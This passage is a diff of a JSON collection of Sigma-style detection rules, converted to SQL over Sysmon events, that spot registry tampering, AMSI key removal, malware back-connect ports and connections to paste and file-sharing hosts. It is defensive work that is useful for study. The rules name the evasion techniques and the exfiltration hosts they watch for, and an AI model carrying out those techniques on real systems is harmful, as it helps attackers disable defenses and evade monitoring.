'%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "status": "test", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", 
"tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image 
LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Office Autorun Keys Modification", - "id": 
"baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND 
TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1202" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": 
"registry_set_persistence_typed_paths.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. 
In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR 
DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1559.001" ], "falsepositives": [ - "Unknown" + "Communication to other corporate systems that use IP addresses from public address spaces" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' 